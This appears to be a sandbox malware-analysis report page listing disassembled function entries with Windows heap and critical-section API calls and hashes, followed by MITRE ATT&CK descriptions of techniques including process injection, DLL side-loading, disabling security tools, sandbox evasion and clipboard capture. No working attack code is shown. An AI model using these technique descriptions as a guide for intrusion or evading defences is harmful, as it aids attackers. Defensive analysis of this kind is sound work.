Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$CloseCriticalHandleLeaveSection
String ID:
API String ID: 1789390409-0
Opcode ID: 6f43ddb781dd67fda8b7c4879908bcc861b456259e0db93089f789fba380d111
Instruction ID: 28b9ab98ccdc4ef9c0cd0990d605cc9acc014391d4d6335fa8f0ee2a6d289ac0
Opcode Fuzzy Hash: 6f43ddb781dd67fda8b7c4879908bcc861b456259e0db93089f789fba380d111
Instruction Fuzzy Hash: 9B919371600201EBDB219F24DC99B9A77B4FB45720F08417AEC099B3D6DB78A941DBA2

Function 007FC6F0 Relevance: 5.2, APIs: 4, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BBFE6088,?,FFFFFFFF), ref: 007FC81C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ec218edef4bd47bf506decc0910aa440ba8d1b2970e70b488602d58e57303c32
Instruction ID: 63d69b9c81ef8223cdfe4270527ee1001f933d6f26040a6181b611003b5f03d7
Opcode Fuzzy Hash: ec218edef4bd47bf506decc0910aa440ba8d1b2970e70b488602d58e57303c32
Instruction Fuzzy Hash: ADA135B0905258DFDB20DF69C948BADBBF4AF48304F1042A9E449A7390DB79AA84CF55

Function 0097EDD0 Relevance: 5.2, APIs: 4, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0097EF43
HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?), ref: 0097EF9D

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?), ref: 0097EFE4
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0097F012

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27cb6e218bdb0c50abdafd767364dd3d5b33edc3560732d520d903af0f693c98
Instruction ID: 436de7beb4d36159089b577778da88615c7b35c81102ec573f9b70932a87f8d1
Opcode Fuzzy Hash: 27cb6e218bdb0c50abdafd767364dd3d5b33edc3560732d520d903af0f693c98
Instruction Fuzzy Hash: 1961A371A016199BDB20DF29DC89B9DB7F9AF49310F148298E81DA77D0DB70AE44CF80

Function 00A35900 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,00A31E72), ref: 00A35ADF

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b79b7f89dc04f59ee5b093e763850ed00faf261d68bf616b1908de70837b8e6d
Instruction ID: 3564800cfeaec676c9b145eec5f2ee44e5fbc702d0216fbbba61c9d2773732f0
Opcode Fuzzy Hash: b79b7f89dc04f59ee5b093e763850ed00faf261d68bf616b1908de70837b8e6d
Instruction Fuzzy Hash: F951CCB1E00A05ABEB20DF29DC89B6AB7F4BB44354F144229F905D7381EB75A9049BE1

Function 00A2AD10 Relevance: 5.2, APIs: 4, Instructions: 160memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,00A2F162,00000000), ref: 00A2AD27
HeapAlloc.KERNEL32(03400000,00000000,00000038,00000000,?,00000000,00A2F162,00000000), ref: 00A2AD44
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 00A2AD84
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A2AE86

Part of subcall function 00A268B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,00A2FC07,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A268B2

Part of subcall function 00A26C70: GetProcessHeap.KERNEL32(BBFE6088,00000000,?,?), ref: 00A26CA8
Part of subcall function 00A26C70: HeapAlloc.KERNEL32(03400000,00000000,00000008,BBFE6088,00000000,?,?), ref: 00A26CC5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcessmalloc$free
String ID:
API String ID: 3221293056-0
Opcode ID: 45a9d682fb79743b943a5219db47848e2aae5eaf60d5d12f5ceb8a05150c2ef0
Instruction ID: b9fa026932469ae48fa38d9408faf542d0833ef6ae259e4b2ccacbe03612e426
Opcode Fuzzy Hash: 45a9d682fb79743b943a5219db47848e2aae5eaf60d5d12f5ceb8a05150c2ef0
Instruction Fuzzy Hash: B8518B717007218FE7319F2DE94571AB7E1EF94721F108639E85ACB790EB71A8058B92

Function 0097E940 Relevance: 5.1, APIs: 4, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?), ref: 0097EA45
HeapFree.KERNEL32(00000000,?,-00000001,00000000,00000001,?,?), ref: 0097EAA0
HeapFree.KERNEL32(00000000,?,-00000001,00000000,00000001,?,?), ref: 0097EAE8
HeapFree.KERNEL32(00000000,?,?,?), ref: 0097EB16

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: efcd560e2cfa22062ac1a3b4a0165e0a4673ec3ec4bc459be9759b19d98db3bf
Instruction ID: 24bb1e803f4ab6cb2d8c9b79dbb2bd67e6ccf06f19111612e70b22564929ea23
Opcode Fuzzy Hash: efcd560e2cfa22062ac1a3b4a0165e0a4673ec3ec4bc459be9759b19d98db3bf
Instruction Fuzzy Hash: A551A471A40218EFDB24CF64DC89B99B7B9FB49310F1482D8E819A72D0DB75AE44CF90

Function 00A35B00 Relevance: 5.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,00A31E62), ref: 00A35C7C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d12d788b0bef33fe27de9d5a86b2862f9d7367270aec196c076351f536d04441
Instruction ID: f57ea9992a736f4cadc6a25a11e8777e5ac010d226d2c087502ba49f87783e6c
Opcode Fuzzy Hash: d12d788b0bef33fe27de9d5a86b2862f9d7367270aec196c076351f536d04441
Instruction Fuzzy Hash: DC41CF71E00B04ABEB209F7DDC46BAEB7B4AF45704F048269F905D7381EB7599448BA1

Function 00714DA0 Relevance: 5.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB369C,BBFE6088,03426818,00000000,00DB3670,00000000,00C11AA4,000000FF,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007121E2
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB36B8,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712205
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB36D4,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712226
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB3674,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712256
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB376C,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712297
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB3744,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007122D8
Part of subcall function 007121B0: InitializeCriticalSection.KERNEL32(00DB3794,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712319

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

InitializeCriticalSection.KERNEL32(00000410), ref: 00714EFC
InitializeCriticalSection.KERNEL32(000002F0), ref: 00714F20
InitializeCriticalSection.KERNEL32(0000030C), ref: 00714F44
InitializeCriticalSection.KERNEL32(00000354,00000001), ref: 00714F71

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalInitializeSection$Heap$AllocateProcess
String ID:
API String ID: 4157389036-0
Opcode ID: b7c9f16a7c880d750482f03a6380f2c54d7d0913ade85a528af4f9d830eafe26
Instruction ID: 17e51d42be28b2e776028c16530b63e023fd73d2589c5ff774b42c6c17b2e12c
Opcode Fuzzy Hash: b7c9f16a7c880d750482f03a6380f2c54d7d0913ade85a528af4f9d830eafe26
Instruction Fuzzy Hash: 2F51B1719007119FDB21CF28C88579ABBF4FB04314F150679ED5ADB3A2D778AA88CB90

Function 00A26830 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,00000000,00000004,00000008,00A28F57), ref: 00A26837
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A26881
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000), ref: 00A26890
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00A2689A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: f83e2a87cd385c8cb9930884ede2356b2b654fd8a9ab9ab5fb92bb1c23a5a91d
Instruction ID: 9ee80b86c82dea660b98f5437257e705f066fc7cef36c71819ccfb15ae8138ac
Opcode Fuzzy Hash: f83e2a87cd385c8cb9930884ede2356b2b654fd8a9ab9ab5fb92bb1c23a5a91d
Instruction Fuzzy Hash: 9301F2B2B002515BD7145B6AFC0876FBBA0EFC5326F28423EF906D3250EF61E96186D5

Function 00A30940 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,00A35118,?,00000000,?,?,?,?,?,00A355E7), ref: 00A30945
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A30993
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A309A2
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A309AC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: dba99a621d093122efb5add9f6b5b8a6ba80ce1c496e8b07625f651eef764bee
Instruction ID: 2c9e19238682690cdfe73f7f83413c03a483c0f381ffe030538cf06739ceec07
Opcode Fuzzy Hash: dba99a621d093122efb5add9f6b5b8a6ba80ce1c496e8b07625f651eef764bee
Instruction Fuzzy Hash: F201F7B17002015BE7145B6AFC18B6FBBA0FFC5326F244139F506D3251EF60E96586E5

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

